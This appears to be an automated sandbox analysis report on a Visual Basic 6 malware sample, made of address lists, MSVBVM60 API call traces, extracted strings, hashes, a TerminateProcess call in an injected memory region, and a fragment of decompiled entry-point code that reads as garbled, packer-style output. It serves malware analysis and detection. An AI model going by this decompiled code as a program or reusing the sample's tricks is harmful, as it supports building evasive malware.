                              0x0040fe8d
                              0x0040fe92
                              0x0040fe92
                              0x0040fec2
                              0x0040fec6
                              0x0040fecb
                              0x0040fee6
                              0x0040feec
                              0x0040feee
                              0x0040fefb
                              0x0040ff20
                              0x0040fefd
                              0x0040fefd
                              0x0040ff02
                              0x0040ff07
                              0x0040ff0d
                              0x0040ff13
                              0x0040ff18
                              0x0040ff18
                              0x0040ff27
                              0x0040ff29
                              0x0040ff2b
                              0x0040ff37
                              0x0040ff38
                              0x0040ff3d
                              0x0040ff47
                              0x0040ff64
                              0x0040ff49
                              0x0040ff49
                              0x0040ff4e
                              0x0040ff53
                              0x0040ff58
                              0x0040ff58
                              0x0040ff88
                              0x0040ff8f
                              0x0040ff94
                              0x0040ffaf
                              0x0040ffb5
                              0x0040ffb7
                              0x0040ffc4
                              0x0040ffe9
                              0x0040ffc6
                              0x0040ffc6
                              0x0040ffcb
                              0x0040ffd0
                              0x0040ffd6
                              0x0040ffdc
                              0x0040ffe1
                              0x0040ffe1
                              0x0040fff7
                              0x00410014
                              0x0040fff9
                              0x0040fff9
                              0x0040fffe
                              0x00410003
                              0x00410008
                              0x00410008
                              0x00410038
                              0x0041003f
                              0x00410044
                              0x0041005f
                              0x00410065
                              0x00410067
                              0x00410074
                              0x00410099
                              0x00410076
                              0x00410076
                              0x0041007b
                              0x00410080
                              0x00410086
                              0x0041008c
                              0x00410091
                              0x00410091
                              0x004100a7
                              0x004100c4
                              0x004100a9
                              0x004100a9
                              0x004100ae
                              0x004100b3
                              0x004100b8
                              0x004100b8
                              0x004100e8
                              0x004100ef
                              0x004100f4
                              0x0041010f
                              0x00410112
                              0x00410114
                              0x00410121
                              0x00410143
                              0x00410123
                              0x00410123
                              0x00410125
                              0x0041012a
                              0x00410130
                              0x00410136
                              0x0041013b
                              0x0041013b
                              0x00410151
                              0x0041016e
                              0x00410153
                              0x00410153
                              0x00410158
                              0x0041015d
                              0x00410162
                              0x00410162
                              0x00410192
                              0x00410199
                              0x0041019e
                              0x004101b9
                              0x004101bf
                              0x004101c1
                              0x004101ce
                              0x004101f3
                              0x004101d0
                              0x004101d0
                              0x004101d5
                              0x004101da
                              0x004101e0
                              0x004101e6
                              0x004101eb
                              0x004101eb
                              0x004101fa
                              0x004101fc
                              0x004101fe
                              0x0041020a
                              0x0041020b
                              0x00410210
                              0x0041021a
                              0x00410237
                              0x0041021c
                              0x0041021c
                              0x00410221
                              0x00410226
                              0x0041022b
                              0x0041022b
                              0x0041025b
                              0x00410262
                              0x00410267
                              0x00410282
                              0x00410288
                              0x0041028a
                              0x00410297
                              0x004102bc
                              0x00410299
                              0x00410299
                              0x0041029e
                              0x004102a3
                              0x004102a9
                              0x004102af
                              0x004102b4
                              0x004102b4
                              0x004102cb
                              0x004102d7
                              0x004102e4
                              0x004102ea
                              0x004102f1
                              0x004102f6
                              0x00410309
                              0x00410310
                              0x00410351
                              0x00410360
                              0x00410368
                              0x00410373
                              0x0041037a
                              0x00410381
                              0x00410388
                              0x0041038f
                              0x00410396
                              0x0041039d
                              0x004103a1
                              0x004103a2
                              0x004103a4
                              0x004103b2
                              0x004103b9
                              0x004103ba
                              0x004103bc
                              0x004103c1
                              0x004103c4
                              0x004103d2
                              0x004103ef
                              0x004103d4
                              0x004103d4
                              0x004103d9
                              0x004103de
                              0x004103e3
                              0x004103e3
                              0x00410413
                              0x00410417
                              0x0041041c
                              0x00410437
                              0x0041043d
                              0x0041043f
                              0x0041044c
                              0x00410471
                              0x0041044e
                              0x0041044e
                              0x00410453
                              0x00410458
                              0x0041045e
                              0x00410464
                              0x00410469
                              0x00410469
                              0x0041047f
                              0x0041049c
                              0x00410481
                              0x00410481
                              0x00410486
                              0x0041048b
                              0x00410490
                              0x00410490
                              0x004104c0
                              0x004104c7
                              0x004104cc
                              0x004104e7
                              0x004104ed
                              0x004104ef
                              0x004104fc
                              0x00410521
                              0x004104fe
                              0x004104fe
                              0x00410503
                              0x00410508
                              0x0041050e
                              0x00410514
                              0x00410519
                              0x00410519
                              0x0041052f
                              0x0041054c
                              0x00410531
                              0x00410531
                              0x00410536
                              0x0041053b
                              0x00410540
                              0x00410540
                              0x00410570
                              0x00410577
                              0x0041057c
                              0x00410597
                              0x0041059a
                              0x0041059c
                              0x004105a9
                              0x004105cb
                              0x004105ab
                              0x004105ab
                              0x004105ad
                              0x004105b2
                              0x004105b8
                              0x004105be
                              0x004105c3
                              0x004105c3
                              0x004105d8
                              0x004105de
                              0x004105e8
                              0x004105f8
                              0x00410604
                              0x0041060a
                              0x00410617
                              0x0041061d
                              0x0041062e
                              0x00410635
                              0x0041063f
                              0x00410649
                              0x00410653
                              0x0041066e
                              0x0041067b
                              0x0041067c
                              0x0041067d
                              0x0041067e
                              0x004106a1
                              0x004106ae
                              0x004106af
                              0x004106b0
                              0x004106b1
                              0x004106b5
                              0x004106c2
                              0x004106c3
                              0x004106c4
                              0x004106c5
                              0x004106ce
                              0x004106d4
                              0x004106e1
                              0x00410703
                              0x004106e3
                              0x004106e3
                              0x004106e8
                              0x004106ed
                              0x004106f0
                              0x004106f6
                              0x004106fb
                              0x004106fb
                              0x00410710
                              0x00410719
                              0x00410722
                              0x00410729
                              0x0041072d
                              0x0041072e
                              0x00410730
                              0x00410735
                              0x0041073e
                              0x00410743
                              0x00410751
                              0x0041076e
                              0x00410753
                              0x00410753
                              0x00410758
                              0x0041075d
                              0x00410762
                              0x00410762
                              0x00410792
                              0x00410796
                              0x0041079b
                              0x004107b6
                              0x004107bc
                              0x004107be
                              0x004107cb
                              0x004107f0
                              0x004107cd
                              0x004107cd
                              0x004107d2
                              0x004107d7
                              0x004107dd
                              0x004107e3
                              0x004107e8
                              0x004107e8
                              0x004107fe
                              0x0041081b
                              0x00410800
                              0x00410800
                              0x00410805
                              0x0041080a
                              0x0041080f
                              0x0041080f
                              0x00410835
                              0x0041083f
                              0x00410846
                              0x0041084b
                              0x00410866
                              0x0041086c
                              0x0041086e
                              0x0041087b
                              0x004108a0
                              0x0041087d
                              0x0041087d
                              0x00410882
                              0x00410887
                              0x0041088d
                              0x00410893
                              0x00410898
                              0x00410898
                              0x004108a7
                              0x004108b0
                              0x004108b9
                              0x004108c3
                              0x004108f6
                              0x00410908
                              0x0041090e
                              0x0041091b
                              0x0041093d
                              0x0041091d
                              0x0041091d
                              0x00410922
                              0x00410927
                              0x0041092a
                              0x00410930
                              0x00410935
                              0x00410935
                              0x0041094b
                              0x00410955
                              0x00410959
                              0x0041095a
                              0x0041095c
                              0x00410961
                              0x0041096a
                              0x0041096f
                              0x0041097d
                              0x0041099a
                              0x0041097f
                              0x0041097f
                              0x00410984
                              0x00410989
                              0x0041098e
                              0x0041098e
                              0x004109be
                              0x004109c2
                              0x004109c7
                              0x004109e2
                              0x004109e5
                              0x004109e7
                              0x004109f4
                              0x00410a16
                              0x004109f6
                              0x004109f6
                              0x004109f8
                              0x004109fd
                              0x00410a03
                              0x00410a09
                              0x00410a0e
                              0x00410a0e
                              0x00410a24
                              0x00410a41
                              0x00410a26
                              0x00410a26
                              0x00410a2b
                              0x00410a30
                              0x00410a35
                              0x00410a35
                              0x00410a65
                              0x00410a6c
                              0x00410a71
                              0x00410a8c
                              0x00410a8f
                              0x00410a91
                              0x00410a9e
                              0x00410ac0
                              0x00410aa0
                              0x00410aa0
                              0x00410aa2
                              0x00410aa7
                              0x00410aad
                              0x00410ab3
                              0x00410ab8
                              0x00410ab8
                              0x00410acd
                              0x00410ad3
                              0x00410ae3
                              0x00410aee
                              0x00410af1
                              0x00410b1c
                              0x00410b27
                              0x00410b2d
                              0x00410b3a
                              0x00410b5c
                              0x00410b3c
                              0x00410b3c
                              0x00410b41
                              0x00410b46
                              0x00410b49
                              0x00410b4f
                              0x00410b54
                              0x00410b54
                              0x00410b66
                              0x00410b78
                              0x00410b80
                              0x00410b89
                              0x00410b8e
                              0x00410b9d
                              0x00410ba3
                              0x00410ba5
                              0x00410bb2
                              0x00410bd4
                              0x00410bb4
                              0x00410bb4
                              0x00410bb9
                              0x00410bbe
                              0x00410bc1
                              0x00410bc7
                              0x00410bcc
                              0x00410bcc
                              0x00410bdb
                              0x00410bdb
                              0x00410be6
                              0x00410be9
                              0x00410bf4
                              0x00000000
                              0x00000000
                              0x00410bf8
                              0x00410bfa
                              0x00410c01
                              0x00410c06
                              0x00410c0d
                              0x00410c14
                              0x00410c1b
                              0x00410c22
                              0x00410c2c
                              0x00410c39
                              0x00410c3f
                              0x00410c46
                              0x00410c47
                              0x00410cc6
                              0x00410cce
                              0x00410cd3

                              APIs
                              • __vbaChkstk.MSVBVM60(?,004012E6), ref: 0040E628
                              • #670.MSVBVM60(?,?,?,?,?,004012E6), ref: 0040E673
                              • __vbaVarTstEq.MSVBVM60(00008008,?), ref: 0040E69A
                              • __vbaFreeVar.MSVBVM60(00008008,?), ref: 0040E6AC
                              • __vbaNew2.MSVBVM60(00402B88,00413010,00008008,?), ref: 0040E6DA
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E713
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000158), ref: 0040E75D
                              • #529.MSVBVM60(00000008), ref: 0040E79B
                              • __vbaFreeObj.MSVBVM60(00000008), ref: 0040E7A3
                              • __vbaFreeVar.MSVBVM60(00000008), ref: 0040E7AE
                              • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0040E7F9
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403928,000006F8), ref: 0040E84D
                              • __vbaFreeVar.MSVBVM60(00000000,?,00403928,000006F8), ref: 0040E867
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040E8AB
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E8E4
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403AEC,00000078), ref: 0040E92B
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040E952
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E98E
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000130), ref: 0040E9DB
                              • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040EA00
                              • __vbaNew2.MSVBVM60(00402B88,00413010,?,?,?,004012E6), ref: 0040EA1B
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EA57
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000118), ref: 0040EAA4
                              • __vbaStrVarMove.MSVBVM60(?), ref: 0040EAD5
                              • __vbaStrMove.MSVBVM60(?), ref: 0040EADF
                              • __vbaVarDup.MSVBVM60(?), ref: 0040EB10
                              • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,v6_,?,00007259,?), ref: 0040EB70
                              • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,?,?,?,v6_,?,00007259,?), ref: 0040EB90
                              • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,004012E6), ref: 0040EBA8
                              • __vbaNew2.MSVBVM60(00402B88,00413010,?,?,?,?,?,?,?,?,?,?,?,004012E6), ref: 0040EBCA
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EC03
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,000000F8), ref: 0040EC50
                              • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040EC75
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040EC90
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040ECCC
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000158), ref: 0040ED16
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040ED3D
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040ED79
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000160), ref: 0040EDC6
                              • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040EDEB
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040EE06
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EE42
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000158), ref: 0040EE8C
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040EEB3
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EEEF
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000080), ref: 0040EF3C
                              • __vbaStrMove.MSVBVM60(00000000,?,00403AEC,00000080), ref: 0040EF7C
                              • __vbaI4Var.MSVBVM60(?), ref: 0040EF88
                              • __vbaI4Var.MSVBVM60(?,?), ref: 0040EFBD
                              • __vbaChkstk.MSVBVM60(?,00000008,?,?,00084AC3,?,?,?), ref: 0040F006
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403928,000006FC), ref: 0040F056
                              • __vbaFreeStr.MSVBVM60(00000000,?,00403928,000006FC), ref: 0040F06D
                              • __vbaFreeObjList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 0040F0A2
                              • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0040F0C1
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040F0E3
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F11C
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000060), ref: 0040F163
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040F18A
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F1C6
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000060), ref: 0040F20D
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040F234
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F270
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000138), ref: 0040F2BD
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040F2E4
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F320
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000130), ref: 0040F36D
                              • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040F392
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040F3AD
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F3E9
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000118), ref: 0040F436
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040F45D
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F499
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000178), ref: 0040F4E6
                              • __vbaStrVarMove.MSVBVM60(?,00000003,?,?), ref: 0040F569
                              • __vbaStrMove.MSVBVM60(?,00000003,?,?), ref: 0040F573
                              • __vbaChkstk.MSVBVM60(00000003,00000000,?,00000003,?,?), ref: 0040F583
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403928,00000700), ref: 0040F5D7
                              • __vbaFreeStr.MSVBVM60(00000000,?,00403928,00000700), ref: 0040F5F9
                              • __vbaFreeObjList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 0040F62E
                              • __vbaFreeVarList.MSVBVM60(00000003,00000003,?,?), ref: 0040F64D
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403928,00000704), ref: 0040F693
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040F6CA
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F703
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403AEC,00000188), ref: 0040F750
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040F777
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F7B3
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000140), ref: 0040F800
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040F827
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F863
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000050), ref: 0040F8A7
                              • __vbaChkstk.MSVBVM60(00000000,?,00403AEC,00000050), ref: 0040F8EF
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403928,00000708), ref: 0040F93D
                              • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0040F965
                              • __vbaFreeVar.MSVBVM60 ref: 0040F973
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040F992
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F9CB
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000188), ref: 0040FA18
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040FA3F
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FA7B
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000048), ref: 0040FABF
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040FAE6
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FB22
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000068), ref: 0040FB69
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040FB90
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FBCC
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000130), ref: 0040FC19
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040FC40
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FC7C
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000108), ref: 0040FCC6
                              • __vbaChkstk.MSVBVM60(00000008,F0230230,00005AFA,?), ref: 0040FD57
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403928,0000070C,?,?,?,0024158F,00000008,F0230230,00005AFA,?), ref: 0040FDBA
                              • __vbaVarMove.MSVBVM60(?,?,?,0024158F,00000008,F0230230,00005AFA,?), ref: 0040FDD7
                              • __vbaFreeStr.MSVBVM60(?,?,?,0024158F,00000008,F0230230,00005AFA,?), ref: 0040FDDF
                              • __vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?,?,?,?,0024158F,00000008,F0230230,00005AFA,?), ref: 0040FE06
                              • __vbaFreeVarList.MSVBVM60(00000002,00000009,00000008), ref: 0040FE1E
                              • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,00402B88,00413010), ref: 0040FE35
                              • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,00402B88,00413010), ref: 0040FE6E
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040FE8D
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FEC6
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,000000F8), ref: 0040FF13
                              • __vbaLateIdCallLd.MSVBVM60(00000009,?,00000000,00000000), ref: 0040FF38
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0040FF53
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FF8F
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000118), ref: 0040FFDC
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 00410003
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041003F
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000140), ref: 0041008C
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 004100B3
                              • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 004100EF
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000068), ref: 00410136
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0041015D
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410199
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,000000F8), ref: 004101E6
                              • __vbaLateIdCallLd.MSVBVM60(00000008,?,00000000,00000000), ref: 0041020B
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 00410226
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410262
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,000000A0), ref: 004102AF
                              • __vbaStrCopy.MSVBVM60(00000000,?,00403AEC,000000A0), ref: 004102CB
                              • __vbaI4Var.MSVBVM60(00000009), ref: 004102F1
                              • __vbaI4Var.MSVBVM60(00000008,?,?,00000009), ref: 00410310
                              • __vbaVarMove.MSVBVM60 ref: 00410360
                              • __vbaFreeStr.MSVBVM60 ref: 00410368
                              • __vbaFreeObjList.MSVBVM60(00000008,?,?,?,00000000,?,?,?,?), ref: 004103A4
                              • __vbaFreeVarList.MSVBVM60(00000002,00000009,00000008), ref: 004103BC
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 004103DE
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410417
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,000000A0), ref: 00410464
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0041048B
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 004104C7
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,000000F8), ref: 00410514
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0041053B
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410577
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000078), ref: 004105BE
                              • __vbaChkstk.MSVBVM60(?,?), ref: 0041066E
                              • __vbaChkstk.MSVBVM60(?,00000009,7C207E50,00005AFD,?,?,?), ref: 004106A1
                              • __vbaChkstk.MSVBVM60(?,00000009,7C207E50,00005AFD,?,?,?), ref: 004106B5
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403928,00000710), ref: 004106F6
                              • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00410730
                              • __vbaFreeVar.MSVBVM60(?,?,00402B88,00413010), ref: 0041073E
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0041075D
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410796
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000178), ref: 004107E3
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 0041080A
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410846
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000118), ref: 00410893
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403928,00000714,?,?,000044D0,?,00005633,?,?), ref: 00410930
                              • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,000044D0,?,00005633,?,?), ref: 0041095C
                              • __vbaFreeVar.MSVBVM60(?,00402B88,00413010,?,?,00402B88,00413010), ref: 0041096A
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 00410989
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 004109C2
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000078), ref: 00410A09
                              • __vbaNew2.MSVBVM60(00402B88,00413010), ref: 00410A30
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410A6C
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,00000060), ref: 00410AB3
                              • __vbaStrCopy.MSVBVM60(00000000,?,00403AEC,00000060), ref: 00410AF1
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403928,00000718,?,?,00000000,?,00855264,0009EC81,?), ref: 00410B4F
                              • __vbaFreeStr.MSVBVM60(?,?,00000000,?,00855264,0009EC81,?), ref: 00410B66
                              • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000,?,00855264,0009EC81,?), ref: 00410B78
                              • __vbaOnError.MSVBVM60(000000FF), ref: 00410B89
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004038F8,000002B4), ref: 00410BC7
                              • __vbaFreeVar.MSVBVM60(00410CD4), ref: 00410CC6
                              • __vbaFreeVar.MSVBVM60(00410CD4), ref: 00410CCE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.272820152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.272812236.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272832673.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272851001.0000000000415000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$CheckHresult$New2$Free$List$Chkstk$Move$CallLate$Copy$#529#670Error
                              • String ID: 3V$BEMISTED$CALICUT$Misbaptize8$OVERGLAMORIZED$SMAAKRAVLET$Tilsjoflingerne9$adkomsthavers$o[>$udsanering$v6_
                              • API String ID: 1286334570-3999088872
                              • Opcode ID: b17130d51a763a1648039e469f50caa1857685e4bca595627aacc3e186968b59
                              • Instruction ID: 7b59dc76167e446bd2618aa978e8832cfc64910ebb390a24748ca419c5501bd0
                              • Opcode Fuzzy Hash: b17130d51a763a1648039e469f50caa1857685e4bca595627aacc3e186968b59
                              • Instruction Fuzzy Hash: 3333E471900228EFDB21DF50CC89BD9BBB8BB08305F1041EAE549BB2A1DB795B85DF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02150B98, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 364COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID: W.E$y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U$y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 0-3368095338
                              • Opcode ID: b00121ad8b0649bfc57cbeeb775ac7c077d93440dcaaaa052e4c53e6235dc975
                              • Instruction ID: be1685bdf105fbe9cdac5d5e12c7b9cd8ad580da83f717b2eab92e391dd74b98
                              • Opcode Fuzzy Hash: b00121ad8b0649bfc57cbeeb775ac7c077d93440dcaaaa052e4c53e6235dc975
                              • Instruction Fuzzy Hash: 4AD1A8325C0224EFDB299F24CC99FE87726EF56314F1442A9EC785B1E5C7789882CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02150BFF, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02153B00
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 560597551-526444393
                              • Opcode ID: f1b22a8722dea5756648d0af83c2de20dab743b2904e6c978dc5c6d6d518502c
                              • Instruction ID: 4234d0f41909433200620c59192962b955a0e60d081a1b866e22f764a954492f
                              • Opcode Fuzzy Hash: f1b22a8722dea5756648d0af83c2de20dab743b2904e6c978dc5c6d6d518502c
                              • Instruction Fuzzy Hash: 2571DD329C1220EFDB388E24CD99FF8B71AEF56310F144299EC74571D4C73998828B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00401480, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 181COMMON
                              Download Yara Rule
                              C-Code - Quality: 16%
                              			_entry_() {
				signed char _t28;
				signed int _t29;
				intOrPtr* _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t44;
				void* _t45;
				intOrPtr* _t47;
				intOrPtr _t54;
				signed int _t59;

				_push("VB5!6&*"); // executed
				L00401478(); // executed
				 *_t28 =  *_t28 + _t28;
				 *_t28 =  *_t28 + _t28;
				 *_t28 =  *_t28 + _t28;
				 *_t28 =  *_t28 ^ _t28;
				 *_t28 =  *_t28 + _t28;
				_t29 = _t28 + 1;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t47 =  *_t47 + _t38;
				_t39 = 0xff485c66;
				asm("sahf");
				asm("sbb eax, [eax]");
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *0xff485c66 =  *0xff485c66 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				_t1 = _t29 - 0x56;
				 *_t1 =  *((intOrPtr*)(_t29 - 0x56)) + _t29;
				_t54 =  *_t1;
				asm("adc al, 0x3");
				_push(_t29);
				asm("gs insb");
				if(_t54 >= 0) {
					L5:
					 *_t29 =  *_t29 + _t29;
					L6:
					 *_t29 =  *_t29 + _t29;
					 *_t29 =  *_t29 + _t29;
					_t59 = _t29 & 0xcd000010;
					asm("sldt word [eax]");
					 *_t47 =  *_t47 + _t39;
					 *((intOrPtr*)(_t29 + 0x72)) =  *((intOrPtr*)(_t29 + 0x72)) + _t44;
					asm("outsd");
					asm("arpl [ebp+0x72], si");
					L7:
					if(_t59 != 0) {
						L17:
						 *_t29 =  *_t29 + _t29;
						 *_t29 =  *_t29 + _t29;
						asm("rol byte [eax], 0x0");
						 *_t29 =  *_t29 + _t29;
						 *_t29 =  *_t29 + _t29;
						 *_t29 =  *_t29 + _t29;
						 *_t29 =  *_t29 + _t29;
						 *_t29 =  *_t29 + _t44;
						 *_t29 =  *_t29 + _t29;
